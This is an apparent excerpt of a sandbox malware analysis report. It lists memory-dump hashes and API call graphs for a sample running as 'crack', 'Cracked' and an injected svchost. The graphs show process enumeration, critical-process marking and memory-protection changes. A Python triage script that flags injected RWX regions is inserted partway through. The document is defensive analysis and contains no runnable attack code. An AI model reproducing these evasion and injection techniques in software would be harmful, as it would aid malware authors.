                                                    • Instruction Fuzzy Hash: ABF0283072EA155FD758B73C940267A33D1EFC8754F100979D94DC7286CE2CB8428784
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9c2030d9d94031e95c51c9f7dc2b4b7824563c3eac45876c761717bcc43590ab
                                                    • Instruction ID: 4ec14dc400391601e56eb57cd2775de2ce976f04af0ab38dd1c4199b93790775
                                                    • Opcode Fuzzy Hash: 9c2030d9d94031e95c51c9f7dc2b4b7824563c3eac45876c761717bcc43590ab
                                                    • Instruction Fuzzy Hash: 93F0F43072D9195FD658B728940667933D1EBCCB44F000539D90EC3388DE28A8428B85
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5c20a622ad259f76207756f15d8e0fb445b815c22ef9bee29f09b14f5a21a92
                                                    • Instruction ID: a24cb93b401487bbbbc50a200c84586029add793ba6148d9b8ea312b20458873
                                                    • Opcode Fuzzy Hash: b5c20a622ad259f76207756f15d8e0fb445b815c22ef9bee29f09b14f5a21a92
                                                    • Instruction Fuzzy Hash: D7418471710315DFCB09ABB9E9187AE3BAEEFC8700F104869A409837B9DE385C06C795
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c04c0c89a92a9f5a35d106adc2cac57a4785f7c3d92bb8cfe93c66e446b3008d
                                                    • Instruction ID: 3805320a44c9db5b1a72cf5fc74667bb744751fec92868634b4925b056a22619
                                                    • Opcode Fuzzy Hash: c04c0c89a92a9f5a35d106adc2cac57a4785f7c3d92bb8cfe93c66e446b3008d
                                                    • Instruction Fuzzy Hash: 02410B357106058FC744EF68D4A4AAE7BF2BF8D614B2544A9E406DB3B5CF749C01CB91
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ff6d5afdfd71aafd3d9a929ef373450bddd6ae07565ade8e7e4dc2549299bf01
                                                    • Instruction ID: c1837c38929f0a65103f019a5b8a626ecfdac532e234c666aabea6c74e94511c
                                                    • Opcode Fuzzy Hash: ff6d5afdfd71aafd3d9a929ef373450bddd6ae07565ade8e7e4dc2549299bf01
                                                    • Instruction Fuzzy Hash: 6E11B4307003089BDB096B79A5657FF69AB9BC8340F20042DE806A73E9CE794D499B95
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a3a805cd137a9eca86618400b222d4caf0265faa9c9dfa05d32212fe9d68ca4
                                                    • Instruction ID: ec01557b667c1c6ce2ba7c23dfd1d9b61b97d2e701638a5945cf234f63aa9ed6
                                                    • Opcode Fuzzy Hash: 0a3a805cd137a9eca86618400b222d4caf0265faa9c9dfa05d32212fe9d68ca4
                                                    • Instruction Fuzzy Hash: F411E2307003089BDB096B79A9657AF79EF9BC8340F20042DE806A73A9CE7D4D499BD5
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 73bd68f628c16659686f9e54a65de341d26ade16686edc1687ccaf1eff592cea
                                                    • Instruction ID: 1f77850103ff37442573b9ce653b1871f9bf14827e6c163a684aef4d93c1436a
                                                    • Opcode Fuzzy Hash: 73bd68f628c16659686f9e54a65de341d26ade16686edc1687ccaf1eff592cea
                                                    • Instruction Fuzzy Hash: DCF09A70A00208CBDB14EF95D9197EF7AF1AB88704F300459E412B7390DBBA0E00CBE6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 346e361f64802fc2fc4261bcf6cca97c40a4eb0cb421f9c8c51f9d7786d1c389
                                                    • Instruction ID: 755bbc25cff4777f0dddc9001769d121af5b4ed7d3341ee5fb2e68e456538bcd
                                                    • Opcode Fuzzy Hash: 346e361f64802fc2fc4261bcf6cca97c40a4eb0cb421f9c8c51f9d7786d1c389
                                                    • Instruction Fuzzy Hash: B0F06D70605248CBDB14DF95E9187EE7FB1AB88704F300569E412B62A4DBB50E04DBA6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cf1a786631b93fd4a8252ff348091ee861e984d05ec85fd98566b69b53cb8b7f
                                                    • Instruction ID: bcec243fe74d2b9e14cdd7a3c027629e6301a0d319af261e313a52f2e6fe8bfd
                                                    • Opcode Fuzzy Hash: cf1a786631b93fd4a8252ff348091ee861e984d05ec85fd98566b69b53cb8b7f
                                                    • Instruction Fuzzy Hash: 6BE048316487D48ED721D678D4153DEBBE2DF85318F0405ADD1995B642C7BB790883B2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bc9295cd2ff796ecfdfbc7f84a3b7db7e695fcde548bab03c1f3f3168568f17c
                                                    • Instruction ID: 538cb4d50c3f8c600f7c528d17b655ee95aa81ad1b0bac840db745c93337707b
                                                    • Opcode Fuzzy Hash: bc9295cd2ff796ecfdfbc7f84a3b7db7e695fcde548bab03c1f3f3168568f17c
                                                    • Instruction Fuzzy Hash: A8C09B7555C1849FCB269B70FCAC6CC3F205D65211F55015EE84B91D71E6555513CF01
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6090d30ff18a492b10e294f1f8fc8dda70057a847f9499260cb585086ad0f58a
                                                    • Instruction ID: 31c0efa467a1c30198e3f152377f7e6495367cb65a927609143441995022940c
                                                    • Opcode Fuzzy Hash: 6090d30ff18a492b10e294f1f8fc8dda70057a847f9499260cb585086ad0f58a
                                                    • Instruction Fuzzy Hash: 22A011300202088B822A2BA0FC0CB8C3B2CAA08202B800022A00E80C20AA2028028A80

                                                    Execution Graph

                                                    Execution Coverage:27.1%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:39.4%
                                                    Total number of Nodes:33
                                                    Total number of Limit Nodes:2
                                                    execution_graph 2589 7ff848f045f5 2591 7ff848f0460f 2589->2591 2590 7ff848f04737 Process32First 2592 7ff848f04743 2590->2592 2591->2590 2591->2592 2593 7ff848f04a25 2594 7ff848f04a4f RtlSetProcessIsCritical 2593->2594 2596 7ff848f04ae0 2594->2596 2615 7ff848f04845 2616 7ff848f04853 FindCloseChangeNotification 2615->2616 2618 7ff848f04914 2616->2618 2619 7ff848f044be 2620 7ff848f044cb CreateToolhelp32Snapshot 2619->2620 2622 7ff848f04568 2620->2622 2597 7ff848f03b8d 2598 7ff848f03b9c 2597->2598 2599 7ff848f03cd3 2598->2599 2602 7ff848f03cd5 2598->2602 2605 7ff848f03d0e 2599->2605 2601 7ff848f03ceb 2603 7ff848f03d0e NtProtectVirtualMemory 2602->2603 2604 7ff848f03cf5 2603->2604 2607 7ff848f03d30 2605->2607 2606 7ff848f03efb 2606->2601 2607->2606 2608 7ff848f04084 NtProtectVirtualMemory 2607->2608 2609 7ff848f040c5 2608->2609 2609->2601 2623 7ff848f028cd 2624 7ff848f028d5 CreateToolhelp32Snapshot 2623->2624 2626 7ff848f04568 2624->2626 2610 7ff848f03d88 2611 7ff848f03dbc 2610->2611 2612 7ff848f03efb 2611->2612 2613 7ff848f04084 NtProtectVirtualMemory 2611->2613 2614 7ff848f040c5 2613->2614

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
                                                    Similarity
                                                    • API ID: MemoryProtectVirtual
                                                    • String ID: cV_H
                                                    • API String ID: 2706961497-633494986
                                                    • Opcode ID: c2852466e2c4261e7d378d7960df7e03d5e38289a7d23a2a6b6ef4bc6b2efd6e
                                                    • Instruction ID: 91291507d2097aa3da640f1554061327cf4aeb500f74b9c180f66200f4084a27
                                                    • Opcode Fuzzy Hash: c2852466e2c4261e7d378d7960df7e03d5e38289a7d23a2a6b6ef4bc6b2efd6e
                                                    • Instruction Fuzzy Hash: 09D14931E1DB495FE71DAB3898562FA77E1EF96350F0441BED08AC31D7EE2868068781

                                                    Control-flow Graph

                                                    control_flow_graph 96 7ff848f028cd-7ff848f028d9 98 7ff848f028f6 96->98 99 7ff848f028db-7ff848f028f5 96->99 100 7ff848f028f7-7ff848f04566 CreateToolhelp32Snapshot 98->100 99->98 99->100 104 7ff848f0456e-7ff848f0458a 100->104 105 7ff848f04568 100->105 105->104
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
                                                    Similarity
                                                    • API ID: CreateSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3332741929-0
                                                    • Opcode ID: 7d90b7c4aed37c2fa4e0fc812608445925b7c70809b96b77d3b6e12e602574c2
                                                    • Instruction ID: c364da192d9a1edda631fdaa29985acde3c6171c88bf03cd6947f4c8660c21de
                                                    • Opcode Fuzzy Hash: 7d90b7c4aed37c2fa4e0fc812608445925b7c70809b96b77d3b6e12e602574c2
                                                    • Instruction Fuzzy Hash: 4831243190C6489FDB15EF98D88A6EA7BF0EF56320F10017FD049C3153DB686845CBA5

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
                                                    Similarity
                                                    • API ID: FirstProcess32
                                                    • String ID:
                                                    • API String ID: 2623510744-0
                                                    • Opcode ID: 3c2cdf8f61c6b5bf3b0433bbd8730c994270351d9b7bbf019d1fca6360361a6d
                                                    • Instruction ID: fe3f60477e2b917506bc1b2b29cf76a380ad5bcc71af72bedc17ce18fa3533f1
                                                    • Opcode Fuzzy Hash: 3c2cdf8f61c6b5bf3b0433bbd8730c994270351d9b7bbf019d1fca6360361a6d
                                                    • Instruction Fuzzy Hash: F051C631D0DA1D8FEB69EB18D845BE977F0FB66314F0001AAD00DD3282EB7599858F81

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 881ba0581588184ff60139bdd1ed3b55070622bf8ef34fe089603789b0f6f6a2
                                                    • Instruction ID: fe64d537bd3096c478c676a8564d525508acfe84d4dcbe6fe32c511b09231115
                                                    • Opcode Fuzzy Hash: 881ba0581588184ff60139bdd1ed3b55070622bf8ef34fe089603789b0f6f6a2
                                                    • Instruction Fuzzy Hash: EA31263090CA899FDB19DB6888467F9BFE0FF66321F04426ED089C31A2DB64A456CB51

                                                    Control-flow Graph

                                                    control_flow_graph 89 7ff848f04a25-7ff848f04ade RtlSetProcessIsCritical 93 7ff848f04ae6-7ff848f04b08 89->93 94 7ff848f04ae0 89->94 94->93
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
                                                    Similarity
                                                    • API ID: CriticalProcess
                                                    • String ID:
                                                    • API String ID: 2695349919-0
                                                    • Opcode ID: 2c08fa45a835b5b0290b7792510c07f2bd5e7af584e86cb845c4d79ed85d442f
                                                    • Instruction ID: d3842b5eba7c6de3d5b78a3ce32cfd240ea25a9ccb537170a158bd7d9d395256
                                                    • Opcode Fuzzy Hash: 2c08fa45a835b5b0290b7792510c07f2bd5e7af584e86cb845c4d79ed85d442f
                                                    • Instruction Fuzzy Hash: 95310A3144D7884FD719EBA8DC49AFA7BF0EF5A310F04016FE08AC3563CA686846CB55

                                                    Control-flow Graph

                                                    control_flow_graph 106 7ff848f044be-7ff848f04566 CreateToolhelp32Snapshot 111 7ff848f0456e-7ff848f0458a 106->111 112 7ff848f04568 106->112 112->111
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
                                                    Similarity
                                                    • API ID: CreateSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3332741929-0
                                                    • Opcode ID: 47c2bfddfa11cbf30422362663d37331eff3577a102eb4813006491f76463849
                                                    • Instruction ID: 3778129145dfd6a311511f751fd63ea1c5a3b76064de303f28bf8b9c39d0a22f
                                                    • Opcode Fuzzy Hash: 47c2bfddfa11cbf30422362663d37331eff3577a102eb4813006491f76463849
                                                    • Instruction Fuzzy Hash: 2521D27090C6489FEB18EFA8D88A6F97BF0EF5A320F04416FD449D7253DB64A845CB52
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 91143d24073065a2d1897b14b6ba323e7520535a0809870aa3bcd1439251307b
                                                    • Instruction ID: e2be7f1a5fe3a5f0dc1fdb3590d3b00f6a2c38a47a071d4ccb0c929ffea0453e
                                                    • Opcode Fuzzy Hash: 91143d24073065a2d1897b14b6ba323e7520535a0809870aa3bcd1439251307b
                                                    • Instruction Fuzzy Hash: 6541D631D1DA095EE71CFB3498861FA73E1EFA5351F44447ED447C399AEE38B4068681
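The function records above all follow one fixed layout (a Memory Dump Source line, the .sdmp region the function was lifted from, the IDA snapshot name, then the Similarity identifiers), which makes them easy to mine during triage, for example to list which APIs each injected region of the Cracked and svchost processes reaches. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. It parses a few records copied from the listing (constructed sample input), decodes the .sdmp name fields that map onto winnt.h constants (base address, PAGE_* protection, MEM_* type; the fifth and eighth dotted fields are kept raw because the page does not define them, so reading the name as pid-index.dump-type.dump-id.base.protection.field5.memory-type.field7 is an assumption), and flags regions that are RWX private memory with no backing PE, which is what "based on PE: false" at an executable address usually indicates: unpacked or injected code rather than a module loaded from disk.

```python
import re
from collections import defaultdict

# Constructed sample: three "Memory Dump Source" records copied from the
# function listings above (PID index 3 "Cracked" and PID index 4 "svchost").
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
Similarity
• API ID: CriticalProcess
• String ID:
• API String ID: 2695349919-0
• Opcode ID: 2c08fa45a835b5b0290b7792510c07f2bd5e7af584e86cb845c4d79ed85d442f
Memory Dump Source
• Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
Similarity
• API ID: CreateSnapshotToolhelp32
• String ID:
• API String ID: 3332741929-0
• Opcode ID: 47c2bfddfa11cbf30422362663d37331eff3577a102eb4813006491f76463849
Memory Dump Source
• Source File: 00000004.00000002.4530992819.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_5c10000_svchost.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID: 4']q
• API String ID: 2492992576-1259897404
• Opcode ID: 414cf536873775b5071714acb1807a55775e4bff24f50551233c7e19067ce0fc
"""

# Page protection and memory type constants as defined in winnt.h.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")


def decode_source_file(name):
    """Split an .sdmp name into its dotted fields (field layout is an assumption,
    see lead-in); base, protection and memory type decode against winnt.h."""
    parts = name.rsplit(".sdmp", 1)[0].split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected sdmp name: {name}")
    protect, mem_type = int(parts[4], 16), int(parts[6], 16)
    return {
        "pid_index": int(parts[0], 10), "dump_type": int(parts[1], 10),
        "dump_id": parts[2], "base": int(parts[3], 16),
        "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
        "field5": parts[5], "mem_type": MEM_TYPE.get(mem_type, hex(mem_type)),
        "field7": parts[7],
    }


def parse_records(text):
    """Turn the flat listing into one dict per function record."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":   # start of a new record
            current = {}
            records.append(current)
            continue
        m = FIELD_RE.match(line) if current is not None else None
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            sdmp = value.split(",", 1)[0]
            current["source_file"] = sdmp
            current.update(decode_source_file(sdmp))
            current["based_on_pe"] = value.endswith("based on PE: true")
        elif key == "Snapshot File":
            current["snapshot"] = value
        elif key == "API ID":   # assumption: several APIs are joined with '$'
            current["apis"] = [a.strip() for a in value.split("$") if a.strip()]
        elif key == "String ID":
            current["string_id"] = value
        elif key == "Opcode ID":
            current["opcode_id"] = value
    return records


def apis_by_snapshot(records):
    """Map each snapshot (one dumped memory region) to the set of APIs seen."""
    out = defaultdict(set)
    for r in records:
        out[r["snapshot"]].update(r.get("apis", []))
    return dict(out)


def rwx_private_regions(records):
    """Snapshots whose region is RWX, MEM_PRIVATE and not backed by a PE on disk:
    the usual footprint of unpacked or injected code."""
    hits = {r["snapshot"] for r in records
            if r["protect"] == "PAGE_EXECUTE_READWRITE"
            and r["mem_type"] == "MEM_PRIVATE" and not r["based_on_pe"]}
    return sorted(hits)


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for snap, apis in apis_by_snapshot(recs).items():
        print(snap, sorted(apis))
    print("RWX private regions:", rwx_private_regions(recs))
```

Running it on a full report text (instead of the embedded sample) gives a per-region API inventory, so the Cracked region at 0x7FF848F00000 stands out immediately for combining process enumeration (CreateToolhelp32Snapshot, Process32First) with RtlSetProcessIsCritical and NtProtectVirtualMemory, while the svchost regions only show exception and callback dispatcher stubs.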

                                                    Execution Graph

                                                    Execution Coverage:15.3%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:87
                                                    Total number of Limit Nodes:0
                                                    execution_graph 23690 5c15320 23691 5c15366 KiUserCallbackDispatcher 23690->23691 23693 5c153b9 23691->23693 23694 5c10b20 23695 5c10b42 LdrInitializeThunk 23694->23695 23697 5c10b7c 23695->23697 23698 52309c8 23699 52309e3 23698->23699 23703 5237570 23699->23703 23717 52375ce 23699->23717 23700 5230a35 23704 523759f 23703->23704 23705 52375ea 23704->23705 23731 5237e6d 23704->23731 23736 5237ece 23704->23736 23741 5237f08 23704->23741 23746 5237e8a 23704->23746 23751 5237eeb 23704->23751 23756 5237ea7 23704->23756 23761 5237e20 23704->23761 23766 5237f58 23704->23766 23771 5237f3b 23704->23771 23776 5237e50 23704->23776 23781 5237e11 23704->23781 23705->23700 23718 52375d9 23717->23718 23719 5237e20 2 API calls 23718->23719 23720 5237ea7 2 API calls 23718->23720 23721 52375ea 23718->23721 23722 5237eeb 2 API calls 23718->23722 23723 5237e8a 2 API calls 23718->23723 23724 5237f08 2 API calls 23718->23724 23725 5237ece 2 API calls 23718->23725 23726 5237e6d 2 API calls 23718->23726 23727 5237e11 2 API calls 23718->23727 23728 5237e50 2 API calls 23718->23728 23729 5237f3b 2 API calls 23718->23729 23730 5237f58 2 API calls 23718->23730 23719->23721 23720->23721 23721->23700 23722->23721 23723->23721 23724->23721 23725->23721 23726->23721 23727->23721 23728->23721 23729->23721 23730->23721 23732 5237e72 23731->23732 23733 5237f73 23732->23733 23786 5c10a6a 23732->23786 23790 5c10a7c 23732->23790 23733->23705 23737 5237ed3 23736->23737 23738 5237f73 23737->23738 23739 5c10a6a KiUserExceptionDispatcher 23737->23739 23740 5c10a7c KiUserExceptionDispatcher 23737->23740 23738->23705 23739->23738 23740->23738 23742 5237f0d 23741->23742 23743 5237f73 23742->23743 23744 5c10a6a KiUserExceptionDispatcher 23742->23744 23745 5c10a7c KiUserExceptionDispatcher 23742->23745 23743->23705 23744->23743 23745->23743 23747 5237e8f 23746->23747 23748 5237f73 23747->23748 23749 5c10a6a KiUserExceptionDispatcher 23747->23749 23750 5c10a7c KiUserExceptionDispatcher 23747->23750 23748->23705 23749->23748 23750->23748 23752 5237ef0 23751->23752 23753 5237f73 23752->23753 23754 5c10a6a KiUserExceptionDispatcher 23752->23754 23755 5c10a7c KiUserExceptionDispatcher 23752->23755 23753->23705 23754->23753 23755->23753 23757 5237eac 23756->23757 23758 5237f73 23757->23758 23759 5c10a6a KiUserExceptionDispatcher 23757->23759 23760 5c10a7c KiUserExceptionDispatcher 23757->23760 23758->23705 23759->23758 23760->23758 23762 5237e46 23761->23762 23763 5237f73 23762->23763 23764 5c10a6a KiUserExceptionDispatcher 23762->23764 23765 5c10a7c KiUserExceptionDispatcher 23762->23765 23763->23705 23764->23763 23765->23763 23767 5237f5d 23766->23767 23768 5237f73 23767->23768 23769 5c10a6a KiUserExceptionDispatcher 23767->23769 23770 5c10a7c KiUserExceptionDispatcher 23767->23770 23768->23705 23769->23768 23770->23768 23772 5237f40 23771->23772 23773 5237f73 23772->23773 23774 5c10a6a KiUserExceptionDispatcher 23772->23774 23775 5c10a7c KiUserExceptionDispatcher 23772->23775 23773->23705 23774->23773 23775->23773 23777 5237e55 23776->23777 23778 5237f73 23777->23778 23779 5c10a6a KiUserExceptionDispatcher 23777->23779 23780 5c10a7c KiUserExceptionDispatcher 23777->23780 23778->23705 23779->23778 23780->23778 23782 5237e46 23781->23782 23783 5237f73 23782->23783 23784 5c10a6a KiUserExceptionDispatcher 23782->23784 23785 5c10a7c KiUserExceptionDispatcher 23782->23785 23783->23705 23784->23783 23785->23783 23787 5c10a7d 23786->23787 23788 5c10a82 KiUserExceptionDispatcher 23787->23788 23789 5c10a95 23787->23789 23788->23787 23789->23733 23791 5c10a7d 23790->23791 23792 5c10a82 KiUserExceptionDispatcher 23791->23792 23793 5c10a95 23791->23793 23792->23791 23793->23733

                                                    Control-flow Graph

                                                    control_flow_graph 735 5c10b20-5c10b75 LdrInitializeThunk 739 5c10b7c-5c10b83 735->739 740 5c10b85-5c10bb9 739->740 741 5c10bcb-5c10be4 739->741 740->741 750 5c10bbb-5c10bc5 740->750 743 5c10be6 741->743 744 5c10bef 741->744 743->744 746 5c10bf0 744->746 746->746 750->741
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4530992819.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5c10000_svchost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8d74147217c662bb2f90bf51523ff776e0c53567895deebb9e7939d5de99697c
                                                    • Instruction ID: 2cb1c4348fdff1954b5dc16f73ebc4a999c5e535a592c7122c71bf2ea02625d1
                                                    • Opcode Fuzzy Hash: 8d74147217c662bb2f90bf51523ff776e0c53567895deebb9e7939d5de99697c
                                                    • Instruction Fuzzy Hash: DA215C317112149FC719EB28C5697AE37F2AF89749F200479C406A7398DF759D82CBD1

                                                    Control-flow Graph

                                                    control_flow_graph 752 5235aa8-5235b0e 754 5235b10-5235b1b 752->754 755 5235b58-5235b5a 752->755 754->755 756 5235b1d-5235b29 754->756 757 5235b5c-5235b75 755->757 758 5235b2b-5235b35 756->758 759 5235b4c-5235b56 756->759 763 5235bc1-5235bc3 757->763 764 5235b77-5235b83 757->764 760 5235b37 758->760 761 5235b39-5235b48 758->761 759->757 760->761 761->761 765 5235b4a 761->765 767 5235bc5-5235c1d 763->767 764->763 766 5235b85-5235b91 764->766 765->759 768 5235b93-5235b9d 766->768 769 5235bb4-5235bbf 766->769 776 5235c67-5235c69 767->776 777 5235c1f-5235c2a 767->777 770 5235ba1-5235bb0 768->770 771 5235b9f 768->771 769->767 770->770 773 5235bb2 770->773 771->770 773->769 779 5235c6b-5235c83 776->779 777->776 778 5235c2c-5235c38 777->778 780 5235c5b-5235c65 778->780 781 5235c3a-5235c44 778->781 786 5235c85-5235c90 779->786 787 5235ccd-5235ccf 779->787 780->779 782 5235c46 781->782 783 5235c48-5235c57 781->783 782->783 783->783 785 5235c59 783->785 785->780 786->787 789 5235c92-5235c9e 786->789 788 5235cd1-5235d36 787->788 798 5235d38-5235d3e 788->798 799 5235d3f-5235d5f 788->799 790 5235cc1-5235ccb 789->790 791 5235ca0-5235caa 789->791 790->788 793 5235cae-5235cbd 791->793 794 5235cac 791->794 793->793 795 5235cbf 793->795 794->793 795->790 798->799 803 5235d69-5235d9f 799->803 806 5235da1-5235da5 803->806 807 5235daf-5235db3 803->807 806->807 808 5235da7 806->808 809 5235dc3-5235dc7 807->809 810 5235db5-5235db9 807->810 808->807 811 5235dd7-5235ddb 809->811 812 5235dc9-5235dcd 809->812 810->809 813 5235dbb 810->813 815 5235deb-5235def 811->815 816 5235ddd-5235de1 811->816 812->811 814 5235dcf-5235dd2 call 5230d6c 812->814 813->809 814->811 819 5235df1-5235df5 815->819 820 5235dff-5235e03 815->820 816->815 818 5235de3-5235de6 call 5230d6c 816->818 818->815 819->820 822 5235df7-5235dfa call 5230d6c 819->822 823 5235e13-5235e17 820->823 824 5235e05-5235e09 820->824 822->820 825 5235e27 823->825 826 5235e19-5235e1d 823->826 824->823 828 5235e0b 824->828 830 5235e28 825->830 826->825 829 5235e1f 826->829 828->823 829->825 830->830
                                                    Strings
